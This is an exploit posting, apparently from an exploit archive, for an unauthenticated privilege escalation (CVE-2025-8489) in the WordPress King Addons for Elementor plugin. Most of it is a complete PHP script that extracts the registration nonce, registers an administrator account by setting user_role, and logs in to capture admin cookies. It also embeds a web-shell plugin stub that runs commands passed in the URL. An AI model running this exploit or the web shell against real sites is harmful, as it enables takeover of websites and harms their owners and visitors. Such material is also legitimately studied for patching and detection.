=============================================================================================================================================
| # Title     : WordPress King Addons for Elementor 24.12.92 to 51.1.14 Unauthenticated Privilege Escalation                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
| # Vendor    : https://wordpress.org/plugins/king-addons/                                                                                  |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212728/ & 	CVE-2025-8489

[+] Summary    : The vulnerability exists in the handle_register_ajax() function within the King Addons plugin. 
                 This function improperly handles user registration without proper authorization checks, allowing attackers to specify the user_role parameter during registration.

[+] Attack Vector :

    Unauthenticated Registration: Attackers can register new users without authentication

    Role Manipulation: The user_role parameter can be set to "administrator"

    Nonce Requirement: Requires a valid nonce exposed on pages containing the "Login Register Form" widget

[+]  POC :

php poc.php https://vulnerable-site.com /register-page/ \

  --username indoushka \
  --password P@ssw0rd123! \
  --email indoushka4ever@gmail.com


<?php

class WordPressKingAddonsExploit {
    private $targetUrl;
    private $username;
    private $password;
    private $email;
    private $noncePage;
    private $cookieJar = [];
    
    public function __construct($targetUrl, $noncePage, $username, $password, $email) {
        $this->targetUrl = rtrim($targetUrl, '/');
        $this->noncePage = $noncePage;
        $this->username = $username;
        $this->password = $password;
        $this->email = $email;
    }
    
    /**
     * تنفيذ الاستغلال
     */
    public function exploit() {
        echo "[*] Starting exploit for CVE-2025-8489\n";
        
        // الخطوة 1: البحث عن nonce
        echo "[*] Searching for nonce on page: {$this->noncePage}\n";
        $nonce = $this->findNonce();
        
        if (!$nonce) {
            echo "[-] Failed to find nonce\n";
            return false;
        }
        
        echo "[+] Found nonce: $nonce\n";
        
        // الخطوة 2: إنشاء مستخدم بصلاحيات مدير
        echo "[*] Creating administrator account\n";
        $userCreated = $this->createAdminUser($nonce);
        
        if (!$userCreated) {
            echo "[-] Failed to create administrator account\n";
            return false;
        }
        
        echo "[+] Administrator account created\n";
        echo "[*] Username: {$this->username}\n";
        echo "[*] Password: {$this->password}\n";
        
        // الخطوة 3: تسجيل الدخول كمدير
        echo "[*] Logging in as administrator\n";
        $adminCookie = $this->wordpressLogin();
        
        if (!$adminCookie) {
            echo "[-] Failed to login as administrator\n";
            return false;
        }
        
        echo "[+] Successfully logged in\n";
        
        return [
            'username' => $this->username,
            'password' => $this->password,
            'cookie' => $adminCookie
        ];
    }
    
    /**
     * البحث عن nonce في الصفحة المحددة
     */
    private function findNonce() {
        $url = $this->targetUrl . '/' . ltrim($this->noncePage, '/');
        $html = $this->httpGet($url);
        
        if (!$html) {
            return null;
        }
        
        // البحث عن nonce في JavaScript
        preg_match('/king_addons_login_register_vars\s*=\s*({[^;]+})/', $html, $matches);
        
        if (isset($matches[1])) {
            $jsonStr = str_replace('\/', '/', $matches[1]);
            $data = json_decode($jsonStr, true);
            
            if (isset($data['register_nonce']) && !empty($data['register_nonce'])) {
                return $data['register_nonce'];
            }
        }
        
        return null;
    }
    
    /**
     * إنشاء مستخدم بصلاحيات مدير
     */
    private function createAdminUser($nonce) {
        $ajaxUrl = $this->targetUrl . '/wp-admin/admin-ajax.php';
        
        $postData = [
            'action' => 'king_addons_user_register',
            'nonce' => $nonce,
            'username' => $this->username,
            'email' => $this->email,
            'password' => $this->password,
            'confirm_password' => $this->password,
            'user_role' => 'administrator',
            'terms_required' => 'no'
        ];
        
        $response = $this->httpPost($ajaxUrl, $postData);
        
        if (!$response) {
            return false;
        }
        
        $json = json_decode($response, true);
        
        if (isset($json['success']) && $json['success'] === true) {
            return true;
        }
        
        // التحقق إذا كان المستخدم موجوداً مسبقاً
        if (isset($json['success']) && $json['success'] === false) {
            $errorMsg = isset($json['data']['message']) ? $json['data']['message'] : '';
            if (preg_match('/(already exists|username.*taken|user.*exists)/i', $errorMsg)) {
                echo "[!] User already exists, attempting to use existing account\n";
                return true;
            }
        }
        
        return false;
    }
    
    /**
     * تسجيل الدخول إلى ووردبريس
     */
    private function wordpressLogin() {
        $loginUrl = $this->targetUrl . '/wp-login.php';
        
        $postData = [
            'log' => $this->username,
            'pwd' => $this->password,
            'wp-submit' => 'Log In',
            'redirect_to' => $this->targetUrl . '/wp-admin/',
            'testcookie' => '1'
        ];
        
        $headers = [
            'Content-Type: application/x-www-form-urlencoded',
            'Referer: ' . $loginUrl
        ];
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $loginUrl);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
        curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
        
        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        
        if ($httpCode === 200 || $httpCode === 302) {
            // استخراج الكوكيز
            preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $response, $matches);
            $cookies = [];
            foreach($matches[1] as $item) {
                parse_str($item, $cookie);
                $cookies = array_merge($cookies, $cookie);
            }
            
            // بناء سلسلة الكوكيز
            $cookieStr = '';
            foreach($cookies as $key => $value) {
                $cookieStr .= "$key=$value; ";
            }
            
            // التحقق من الصلاحيات
            $adminUrl = $this->targetUrl . '/wp-admin/';
            $adminPage = $this->httpGet($adminUrl, $cookieStr);
            
            if (strpos($adminPage, 'wp-admin-bar') !== false) {
                return $cookieStr;
            }
        }
        
        return false;
    }
    
    /**
     * رفع وتنفيذ ملف اختراق (Proof of Concept فقط)
     */
    public function uploadMaliciousPlugin($adminCookie) {
        echo "[*] Warning: This function demonstrates file upload capability\n";
        echo "[*] For educational purposes only!\n";
        
        // هذا مجرد مثال توضيحي
        $pluginContent = '<?php
/**
 * Plugin Name: Malicious Demo
 * Description: Proof of Concept - DO NOT USE IN PRODUCTION
 */
 
if (isset($_GET["cmd"]) && current_user_can("administrator")) {
    system($_GET["cmd"]);
}
?>';
        
        // Note: Actual plugin upload requires more complex implementation
        // involving ZIP creation and WordPress upload mechanisms
        
        return false;
    }
    
    /**
     * طلب HTTP GET
     */
    private function httpGet($url, $cookie = '') {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
        
        if ($cookie) {
            curl_setopt($ch, CURLOPT_COOKIE, $cookie);
        }
        
        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        
        return ($httpCode == 200) ? $response : false;
    }
    
    /**
     * طلب HTTP POST
     */
    private function httpPost($url, $data, $cookie = '') {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
        
        if ($cookie) {
            curl_setopt($ch, CURLOPT_COOKIE, $cookie);
        }
        
        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        
        return ($httpCode == 200) ? $response : false;
    }
}

/**
 * واجهة سطر الأوامر (CLI)
 */
if (php_sapi_name() === 'cli') {
    echo "=== WordPress King Addons Exploit (CVE-2025-8489) ===\n\n";
    
    if ($argc < 3) {
        echo "Usage: php " . basename(__FILE__) . " [target_url] [nonce_page_path]\n";
        echo "Example: php exploit.php https://example.com /page-with-form/\n\n";
        echo "Optional parameters:\n";
        echo "  --username [username]  (default: random)\n";
        echo "  --password [password]  (default: random)\n";
        echo "  --email [email]        (default: random)\n";
        exit(1);
    }
    
    $targetUrl = $argv[1];
    $noncePage = $argv[2];
    
    // القيم الافتراضية
    $username = 'admin_' . substr(md5(time()), 0, 8);
    $password = substr(md5(time()), 0, 12);
    $email = substr(md5(time()), 0, 8) . '@example.com';
    
    // معالجة الوسائط الإضافية
    for ($i = 3; $i < $argc; $i++) {
        if ($argv[$i] === '--username' && isset($argv[$i+1])) {
            $username = $argv[++$i];
        } elseif ($argv[$i] === '--password' && isset($argv[$i+1])) {
            $password = $argv[++$i];
        } elseif ($argv[$i] === '--email' && isset($argv[$i+1])) {
            $email = $argv[++$i];
        }
    }
    
    // تنفيذ الاستغلال
    $exploit = new WordPressKingAddonsExploit($targetUrl, $noncePage, $username, $password, $email);
    $result = $exploit->exploit();
    
    if ($result) {
        echo "\n[+] Exploit successful!\n";
        echo "[+] Administrator credentials:\n";
        echo "    URL: " . $targetUrl . "/wp-admin/\n";
        echo "    Username: " . $result['username'] . "\n";
        echo "    Password: " . $result['password'] . "\n";
        echo "\n[!] Important: Remove the created user after testing!\n";
    } else {
        echo "\n[-] Exploit failed\n";
    }
} else {
    echo "This script is intended for command line use.\n";
}
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================